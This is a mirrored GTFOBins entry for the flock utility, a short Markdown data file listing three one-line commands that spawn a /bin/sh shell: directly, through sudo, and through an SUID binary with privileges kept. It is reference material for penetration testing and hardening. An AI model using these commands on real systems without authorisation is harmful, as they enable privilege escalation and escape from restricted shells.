1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-08 08:31:32 +01:00
GTFOBins.github.io/_gtfobins/flock.md
2018-06-04 12:46:28 +02:00

10 lines
177 B
Markdown

---
functions:
execute-interactive:
- code: flock -u / /bin/sh
sudo-enabled:
- code: sudo flock -u / /bin/sh
suid-enabled:
- code: ./flock -u / /bin/sh -p
---